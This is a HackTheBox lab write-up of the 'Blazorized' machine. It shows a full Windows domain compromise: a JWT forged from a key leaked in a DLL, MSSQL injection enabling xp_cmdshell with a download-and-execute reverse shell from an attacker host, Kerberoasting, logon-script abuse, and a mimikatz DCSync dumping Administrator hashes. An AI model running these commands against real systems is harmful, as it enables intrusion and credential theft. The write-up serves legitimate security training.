Hackthebox: Blazorized

Foued SAIDI

Overview

Blazorized is a Hard-difficulty Windows HackTheBox machine. It starts with subdomain enumeration and DLL decompiling, which lets us forge our own JWT token and get into the admin panel, where we abuse an SQL injection against MSSQL to get a shell. From there, a mix of different attacks gets us the remaining users: Kerberoasting, then setting and abusing a logon script path, then DCSync to get SYSTEM. It was a really fun box.

Blazorized-info-card

Reconnaissance

Nmap

PS C:\Users\0xkujen> nmap -A -Pn 10.129.23.80 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-10 21:55 W. Central Africa Standard Time
Nmap scan report for 10.129.23.80
Host is up (0.30s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-10 21:01:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2022
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-10T20:59:17
|_Not valid after: 2054-11-10T20:59:17
|_ssl-date: 2024-11-10T21:01:59+00:00; +5m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-11-10T21:01:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 4m59s, deviation: 0s, median: 4m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.48 seconds
PS C:\Users\0xkujen>

We can see that we have a web application running on port 80 that redirects us to blazorized.htb. Let’s add that entry to our /etc/hosts file and check what we have ;)

Subdomain Enumeration

We perform some subdomain enumeration on the main domain and we find something interesting:

PS C:\Users\0xkujen\Desktop\Tools\ffuf_2.0.0_windows_amd64> .\ffuf.exe -w ..\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.blazorized.htb" -u "http://10.129.23.80" -fs 144

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.0.0
________________________________________________

:: Method : GET
:: URL : http://10.129.23.80
:: Wordlist : FUZZ: C:\Users\0xkujen\Desktop\Tools\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 144
________________________________________________

[Status: 200, Size: 2072, Words: 149, Lines: 28, Duration: 327ms]0:00:00] :: Errors: 0 ::
* FUZZ: admin

We go ahead and add admin.blazorized.htb to our /etc/hosts file.

Web Application - http://blazorized.htb/

Web Application

This site is a personal Digital Garden, and the “Built with Blazor WebAssembly” note is interesting, as it will come in handy later.
(I found an XSS vulnerability under the http://blazorized.htb/markdown endpoint, but it turned out to be a rabbit hole :’( )

Checking Caido while browsing the application shows that a lot of DLLs are being loaded into the app:

Web Application

But navigating to the /check-updates endpoint, we see a new DLL being loaded. This shows that the app implements lazy loading, providing resources as the user needs them rather than loading everything at once (this is what I understood from the framework’s docs).
Navigating to this endpoint, we get the message: “However, you can use the button below to impersonate (temporarily, and securely) the admin and fetch all post and category updates.”
So I thought this /_framework/Blazorized.Helpers.dll DLL would be interesting; let’s download it and open it with dotPeek:

Helpers DLL Inspection

We can see that one of the helpers is the implementation of the application’s JWT policy, which contains the security key and a mention of the admin dashboard we found earlier. I think it’s about time we go ahead and explore it ;)

Web Application - http://admin.blazorized.htb/

Admin Dashboard

It looks like a simple admin dashboard with a login feature, but I could not find a cookie anywhere to exploit the JWT settings we got earlier.
Then I had an idea: since we know the app implements lazy loading, I checked other endpoints on the main domain to see if I could get something interesting. And we do get a response from the API with a model for the JWT token:

Admin Dashboard

Admin Dashboard

We can see that the roles we have within that token are only “Posts_Get_All” and “Categories_Get_All”. But checking the DLL we decompiled, we can see that there is a superAdminRoleClaimValue = "Super_Admin" role and that the algorithm used is “HS512”.
So we should update our token with that role and set the audience to “http://admin.blazorized.htb”. Let’s see:

Admin Dashboard

And test it out on our admin dashboard:

Admin Dashboard

And we are in!
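To show why the signing key compiled into Blazorized.Helpers.dll is the root cause here, the following added example (not code from the write-up or from the application) builds and verifies HS512 tokens with Python’s standard library; the key values and the “role” claim name are constructed assumptions.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed stand-ins: the real key from Blazorized.Helpers.dll is not
# reproduced, and the role claim is assumed to be named "role".
LEAKED_KEY = b"constructed-key-that-shipped-inside-the-client-dll"
ROTATED_KEY = b"constructed-replacement-key-held-server-side-only"
PUBLIC_AUDIENCE = "http://blazorized.htb"
ADMIN_AUDIENCE = "http://admin.blazorized.htb"
SUPER_ADMIN_ROLE = "Super_Admin"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs512(claims: dict, key: bytes) -> str:
    """Mint header.payload.signature with HMAC-SHA512, the DLL's algorithm."""
    header = _b64url(json.dumps({"alg": "HS512", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    mac = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha512).digest()
    return f"{header}.{payload}.{_b64url(mac)}"


def verify_hs512(token: str, key: bytes, audience: str, now: int) -> Optional[dict]:
    """Server-side validation: pinned algorithm, constant-time MAC compare,
    audience and expiry. Returns the claims, or None on any failure."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, payload, sig = parts
    if json.loads(_unb64url(header)).get("alg") != "HS512":  # no alg negotiation
        return None
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha512).digest()
    if not hmac.compare_digest(expected, _unb64url(sig)):
        return None
    claims = json.loads(_unb64url(payload))
    if claims.get("aud") != audience or claims.get("exp", 0) <= now:
        return None
    return claims


def is_super_admin(claims: Optional[dict]) -> bool:
    return bool(claims) and SUPER_ADMIN_ROLE in claims.get("role", [])


def demo(now: int) -> dict:
    """Replay the write-up's situation with the constructed keys."""
    issued = sign_hs512({"role": ["Posts_Get_All", "Categories_Get_All"],
                         "aud": PUBLIC_AUDIENCE, "exp": now + 600}, LEAKED_KEY)
    forged = sign_hs512({"role": [SUPER_ADMIN_ROLE],
                         "aud": ADMIN_AUDIENCE, "exp": now + 600}, LEAKED_KEY)
    # Forged header+payload over the issued token's signature: MAC no longer matches.
    spliced = ".".join([forged.split(".")[0], forged.split(".")[1], issued.split(".")[2]])
    return {
        # The token the API hands out is useless against the admin audience...
        "issued_rejected_by_admin": not is_super_admin(
            verify_hs512(issued, LEAKED_KEY, ADMIN_AUDIENCE, now)),
        # ...but whoever holds the key from the DLL mints one the server accepts.
        "forged_accepted_with_leaked_key": is_super_admin(
            verify_hs512(forged, LEAKED_KEY, ADMIN_AUDIENCE, now)),
        # Rotating to a key that never leaves the server invalidates the forgery.
        "forged_rejected_after_rotation": verify_hs512(
            forged, ROTATED_KEY, ADMIN_AUDIENCE, now) is None,
        # Without the key, editing claims breaks the signature check.
        "spliced_rejected": verify_hs512(spliced, LEAKED_KEY, ADMIN_AUDIENCE, now) is None,
    }


if __name__ == "__main__":
    for check, result in demo(1_700_000_000).items():
        print(f"{check}: {result}")
```

The fix is therefore not in the verifier, which is doing everything right, but in keeping the symmetric key out of anything the browser downloads (or switching to an asymmetric algorithm so the client only ever holds the public half).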

SQL Injection - http://admin.blazorized.htb/check-duplicate-post-title

There seems to be an SQLI in the http://admin.blazorized.htb/check-duplicate-post-title endpoint:

SQL Injection

Also, during our initial Nmap scan, we saw an MSSQL service running, so I’ll assume the injected query is being executed against an MSSQL database. This reference can be useful: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/314e4da9632f6e20cd149ca55020e50556c6280f/SQL%20Injection/MSSQL%20Injection.md#L4

We execute these queries through the injection point to enable xp_cmdshell and get a reverse shell:

;' EXECUTE sp_configure 'show advanced options',1 -- -
;' RECONFIGURE
;' EXECUTE sp_configure 'xp_cmdshell',1 -- -
;' RECONFIGURE
; ' EXECUTE master.dbo.xp_cmdshell 'powershell -c "iex(New-Object Net.WebClient).DownloadString(''http://10.10.x.x/r.ps1'')" --

And I have a shell:

PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.23.80] 63124
Windows PowerShell running as user DC1$ on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
blazorized\nu_1055
PS C:\Windows\system32>

And our user flag:

PS C:\users\nu_1055\desktop> ls


Directory: C:\users\nu_1055\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/10/2024 2:59 PM 34 user.txt


PS C:\users\nu_1055\desktop> cat user.txt
3cc2d0241aa485******************
PS C:\users\nu_1055\desktop>

Privilege Escalation

Kerberoasting the rsa_4810 user

I’ll first run SharpHound on the box and visualize the results in BloodHound:

PS C:\users\nu_1055> ./SharpHound.exe -c all

2024-11-10T17:24:23.4251341-06:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-11-10T17:24:23.5970045-06:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-10T17:24:23.6282573-06:00|INFORMATION|Initializing SharpHound at 5:24 PM on 11/10/2024
2024-11-10T17:24:23.8938920-06:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-10T17:24:24.0501665-06:00|INFORMATION|Beginning LDAP search for blazorized.htb
2024-11-10T17:24:24.0970246-06:00|INFORMATION|Producer has finished, closing LDAP channel
2024-11-10T17:24:24.0970246-06:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-11-10T17:24:54.6908030-06:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-11-10T17:25:13.0657537-06:00|INFORMATION|Consumers finished, closing output channel
2024-11-10T17:25:13.0970076-06:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-11-10T17:25:13.2845061-06:00|INFORMATION|Status: 110 objects finished (+110 2.244898)/s -- Using 43 MB RAM
2024-11-10T17:25:13.2845061-06:00|INFORMATION|Enumeration finished in 00:00:49.2326936
2024-11-10T17:25:13.3626356-06:00|INFORMATION|Saving cache with stats: 70 ID to type mappings.
70 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-11-10T17:25:13.3782603-06:00|INFORMATION|SharpHound Enumeration Completed at 5:25 PM on 11/10/2024! Happy Graphing!

I’ll now use this script to base64-encode the zip so I can transfer it out of the machine:

$inputFile = "C:\users\nu_1055\20241110172512_BloodHound.zip"
$outputFile = "C:\users\nu_1055\mem.b64"

# Open input file and output file streams
$inputStream = [System.IO.File]::OpenRead($inputFile)
$outputStream = [System.IO.StreamWriter]::new($outputFile)

try {
    # Chunk size must be a multiple of 3 bytes so that no chunk ends with
    # base64 padding; otherwise the concatenated lines cannot be decoded as one blob
    $chunkSize = 60KB
    $buffer = New-Object byte[] $chunkSize

    # Read and encode the file in chunks, one base64 line per chunk
    while (($bytesRead = $inputStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
        $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
        $outputStream.WriteLine($encodedChunk)
    }
}
finally {
    # Close the file streams
    $inputStream.Close()
    $outputStream.Close()
}

Write-Host "Base64 encoding completed."

Then clean it up and decode it on my machine:

┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ nano b64.data

┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ grep -o '[A-Za-z0-9+/=]' b64.data | tr -d '\n' > cleaned.b64


┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ base64 -d cleaned.b64 > bloodhound.zip

We can see from the BloodHound analysis that the “nu_1055” user has WriteSPN over RSA_4810:

BloodHound

“Kerberoasting” is an attack where an authenticated user requests a ticket for a service by its SPN (Service Principal Name); the ticket that comes back is encrypted with a key derived from the password of the account associated with that service, and that’s what we crack ;)

The first step is to assign an SPN to the RSA_4810 user and then request a TGS for it. We’ll do this using PowerView:

PS C:\users\nu_1055> get-domainuser rsa_4810


logoncount : 23
badpasswordtime : 2/1/2024 1:29:42 PM
distinguishedname : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : RSA_4810
lastlogontimestamp : 7/12/2024 6:25:46 AM
userprincipalname : [email protected]
samaccountname : RSA_4810
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 11/10/2024 11:47:57 PM
instancetype : 4
usncreated : 24627
objectguid : ed5f4235-a152-4952-bed0-28ae811ee7f4
lastlogoff : 12/31/1600 6:00:00 PM
whencreated : 1/9/2024 11:37:15 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {2/2/2024 2:44:29 PM, 2/2/2024 2:40:50 PM, 1/11/2024 2:13:10 AM, 1/10/2024 6:28:26 PM...}
serviceprincipalname : kujen/hehe
usnchanged : 356825
memberof : {CN=Remote_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management
Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon : 2/2/2024 11:44:30 AM
badpwdcount : 0
cn : RSA_4810
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid : S-1-5-21-2039403211-964143010-2924010611-1107
primarygroupid : 513
pwdlastset : 2/25/2024 11:55:59 AM
name : RSA_4810

The SPN is now “kujen/hehe”, let’s request a TGS:

PS C:\users\nu_1055> Get-DomainSPNTicket -SPN kujen/hehe


SamAccountName : UNKNOWN
DistinguishedName : UNKNOWN
ServicePrincipalName : kujen/hehe
TicketByteHexStream :
Hash : $krb5tgs$23$*UNKNOWN$UNKNOWN$kujen/hehe*$850720821AFC4CE7E1F59271D3D35181$FBF1C69E09496058DAF58F
A1807F8EDC6106EED2F3595F18029048CA9F00A5FED9D37F6081BE5CF841E788E288FA9990DA21BC550424811D36F8E6
ADD58F0C26CEB0B7085E935A97603AC3973E150593E2AEF5A3C42618D6EF51F9576670DD3704EBEF615A812985C85505
228169288A43762C21E259AFB2C80E0A1ABAF4CA172E84088B2160B1669EBBDFE2358EF1A934B8C12D05A7FEC41C2A51
3FB185C22ECFCFE058ACA77D14177A39EE209580F34DCC3BF0563C2AC1194B3E4F60B45D478F28B9AE7182BAFF5DA5AF
734C09D3189EE017B0CA1BDBE0538360AE96ED46B0901E8BEC357E1FF2B7A0B8A5DBBD43F5FFF16010346F1E7444F389
74D35403517E415AF0E496ED66968A6D36AC61980F4A46C2C0F881969DC766CAFEA3F1A59742E75DA2324703C7AFE0C7
5950C3524B6FE0E69B7743AC7B98DC63A5243DBE8648B2D43418986D1D3200724B48CCB923AD63754E4D9A9A1978DD02
A93F2A4751C5482A436A7060E28F4059141196A4C5400C9D3A8E5B7E13812A9EF5A1F9DC8F4B09A9949F97CFDC872352
7AD422CABF649C176BD369993BC0BB9A31D170D258FD4B5889200B624F19DB192038EA00B1015C60C8F473FCC152E3EB
A01D30407206690DC0A28A5BDE26D05795EE9E90638D2444E66BBB6F4ABF0021B989D5CC458C1FC1AE13EA9A7FFADFE6
9626CA4AC7363C37B575DF370DB7E375B69334605E05EF922F7A0507B6DC78608E08B81203558398A60487443540BF08
7B2F46EAC90E9A373BD064DF1FCA5CECBADBA0F85AC2DFECCD6E51F9FC7E8845A470A0092D2958957E1F9DE6C31C81EF
123E1F3AA280D124C3996D141537DB6A515B30CE65A6748B68BBD6A988AFC3F77DD11B456F8E4B708D5A99EBCA88BADA
071940B49B4526289FB802500C17100B26C14F1D0FA53716B2A04FD64C7E1BABE336FE373F9A0E68C218EAE724C303DE
18DEB9C2C716AF6D97DC6E72EB386628C1C1DE08E7B897AB02EE5CC594D6FA314EDC1431A65AA131677CC38922D05BBF
687147C59C4024EF10F8751880A32F950A15B2001AA289A849EBBDB101DA5BD24FD318A575B4B5BD5A56F9E1B84554A2
5DA005A9CD17C9454780D6E8C49D4BBB28000195E11CB1C6529A790DB172EDBF079642BF1DE379293B2F3FEB013A5DEC
C0181BDA337B0EBDEDFCA7E6B1CD042665A8AE2FD8A2E05FA1797A1837ACB28241CEC84E00BBA559DE57185AD5263489
75D0F7240300DCFF0EB196B4E65033804C3525688CC666638C10C51D42CC1CFCA161408B22E356533E489919B3935594
FE3EF898189D1DFFDE46C741135536B7A3DE437847B4145125B3ED94DA02EF70B962D804DFAF9CC081141319158852FC
5CF2ECEDFD94DA6EC349312EA2D0A9D200B2A7CD1140F28D52CED48D9C5B350B86F64A0DE9C3BB37C0DFBEBA56F25662
069616BD4A2588B2D5940B0B0B195A62A15619304C56E8FF1917D1451CA5F6AD631A2AF3F57E42F23EABF1C6CC4E87FD
D5D81F19A2FF08FD96F175E8B3FB6256DC59D16A7D657FA4B9E8E0C7674DBE237F95A64AA44E76C609D46359307776D4
7BDA4E7D2C1ED4CAC164E0A45BB4F1983CB6E2BB564A5632299199F29CB1E3FE27043D560D0417591E15863904609552
524E5C725158D1245449ED727914E47D884006E0B91F68B57ACBED0590D85486B104051CF7CD0C7554DF9710B0D5BE75
2EEF2E3A40916EA200594573054812693F463DBC9B28991432215A7FD34DB814703771A32E6A5348ACE01B5CB3



PS C:\users\nu_1055>

Let’s attempt to crack it:

Kerberoasting

And our password is: (Ni7856Do9854Ki05Ng0005 #)

I can use it to log in as that user with Evil-WinRM:

┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ evil-winrm -i blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami
blazorized\rsa_4810
*Evil-WinRM* PS C:\Users\RSA_4810\Documents>

Pivoting to SSA_6010 - Script Execution

When I first solved the machine, the ssa_6010 user already had a “scriptpath” attribute set, which I changed to point at a reverse shell script and got a shell as that user. Let’s check whether we can set the scriptpath attribute for that user ourselves:

*Evil-WinRM* PS C:\Users\RSA_4810\Documents> Set-DomainObject -Identity SSA_6010 -SET @{scriptpath='kujen'}
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> get-domainuser SSA_6010 -properties *


logoncount : 3278
badpasswordtime : 6/19/2024 9:58:18 AM
distinguishedname : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : SSA_6010
lastlogontimestamp : 11/10/2024 3:00:14 PM
userprincipalname : [email protected]
samaccountname : SSA_6010
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 11/11/2024 12:10:00 AM
instancetype : 4
usncreated : 29007
objectguid : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff : 12/31/1600 6:00:00 PM
whencreated : 1/10/2024 2:32:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
usnchanged : 356866
memberof : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon : 11/10/2024 6:09:14 PM
cn : SSA_6010
badpwdcount : 0
scriptpath : kujen
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid : S-1-5-21-2039403211-964143010-2924010611-1124
primarygroupid : 513
pwdlastset : 2/25/2024 11:56:55 AM
name : SSA_6010



Something that was weird to me is that .bat files placed in any directory other than C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\ will not work. It turns out the logon process resolves the scriptpath attribute relative to that scripts folder, appending the attribute value to it.
Checking that directory, I find that the “A32FF3AEAA23” folder is writable, so let’s use it:

*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts> icacls A32FF3AEAA23
A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
BLAZORIZED\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts> cd A32FF3AEAA23
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23> echo 'powershell -e <base64-encoded reverse shell payload omitted>' | Out-FIle -FIlePath kujen.bat -Encoding ASCII
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23> Set-DomainObject -Identity SSA_6010 -SET @{scriptpath='A32FF3AEAA23\kujen.bat'}
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23>

And we got a shell:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.23.80] 52900
whoami
blazorized\ssa_6010
PS C:\Windows\system32>

Pivoting to Administrator - DCSync

We can see that our current user is a member of the “Super_Support_Administrators” group:

PS C:\Windows\system32> whoami /all

USER INFORMATION
----------------

User Name SID
=================== =============================================
blazorized\ssa_6010 S-1-5-21-2039403211-964143010-2924010611-1124


GROUP INFORMATION
-----------------

Group Name Type SID Attributes

========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Super_Support_Administrators Group S-1-5-21-2039403211-964143010-2924010611-1123 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

Checking our BloodHound results, we can see that we can perform DCSync:

DCSync

So let’s do it and finish this box:

PS C:\users\ssa_6010\documents> iwr 10.10.x.x/BetterSafetyKatz.exe -outfile s.exe
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory

[+] Slowly mapping ADVAPI32.dll

[+] Slowly mapping Cabinet.dll

[+] Slowly mapping CRYPT32.dll

[+] Slowly mapping cryptdll.dll

[+] Slowly mapping DNSAPI.dll

[+] Slowly mapping FLTLIB.DLL

[+] Slowly mapping MPR.dll

[+] Slowly mapping NETAPI32.dll

[+] Slowly mapping ODBC32.dll

[+] Slowly mapping ole32.dll

[+] Slowly mapping OLEAUT32.dll

[+] Slowly mapping RPCRT4.dll

[+] Slowly mapping SHLWAPI.dll

[+] Slowly mapping SAMLIB.dll

[+] Slowly mapping Secur32.dll

[+] Slowly mapping SHELL32.dll

[+] Slowly mapping USER32.dll

[+] Slowly mapping USERENV.dll

[+] Slowly mapping VERSION.dll

[+] Slowly mapping HID.DLL

[+] Slowly mapping SETUPAPI.dll

[+] Slowly mapping WinSCard.dll

[+] Slowly mapping WINSTA.dll

[+] Slowly mapping WLDAP32.dll

[+] Slowly mapping advapi32.dll

[+] Slowly mapping msasn1.dll

[+] Slowly mapping ntdll.dll

[+] Slowly mapping netapi32.dll

[+] Slowly mapping KERNEL32.dll
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:blazorized\Administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'blazorized\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 11:54:43 AM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500

Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
ntlm- 5: b471c416c10615448c82a2cbb731efcb
ntlm- 6: b471c416c10615448c82a2cbb731efcb
ntlm- 7: aec132eaeee536a173e40572e8aad961
ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: ad37753b9f78b6b98ec3bb65e5995c73
lm - 1: c449777ea9b0cd7e6b96dd8c780c98f0
lm - 2: ebbe34c80ab8762fa51e04bc1cd0e426
lm - 3: 471ac07583666ccff8700529021e4c9f
lm - 4: ab4d5d93532cf6ad37a3f0247db1162f
lm - 5: ece3bdafb6211176312c1db3d723ede8
lm - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
lm - 7: 8b3c1950099a9d59693858c00f43edaf
lm - 8: a14ac624559928405ef99077ecb497ba

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 36ff197ab8f852956e4dcbbe85e38e17

* Primary:Kerberos-Newer-Keys *
Default Salt : BLAZORIZED.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
aes128_hmac (4096) : df4dbea7fcf2ef56722a6741439a9f81
des_cbc_md5 (4096) : 310e2a0438583dce
OldCredentials
aes256_hmac (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
aes128_hmac (4096) : db4d9e0e5cd7022242f3e03642c135a6
des_cbc_md5 (4096) : 1c67ef730261a198
OlderCredentials
aes256_hmac (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
aes128_hmac (4096) : 2d9925ef94916523b24e43d1cb8396ee
des_cbc_md5 (4096) : 9b01158c8923ce68

* Primary:Kerberos *
Default Salt : BLAZORIZED.HTBAdministrator
Credentials
des_cbc_md5 : 310e2a0438583dce
OldCredentials
des_cbc_md5 : 1c67ef730261a198

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 7e35fe37aac9f26cecc30390171b6dcf
02 a8710c4caaab28c0f2260e7c7bd3b262
03 81eae4cf7d9dadff2073fbf2d5c60539
04 7e35fe37aac9f26cecc30390171b6dcf
05 9bc0a87fd20d42df13180a506db93bb8
06 26d42d164b0b82e89cf335e8e489bbaa
07 d67d01da1b2beed8718bb6785a7a4d16
08 7f54f57e971bcb257fc44a3cd88bc0e3
09 b3d2ebd83e450c6b0709d11d2d8f6aa8
10 1957f9211e71d307b388d850bdb4223f
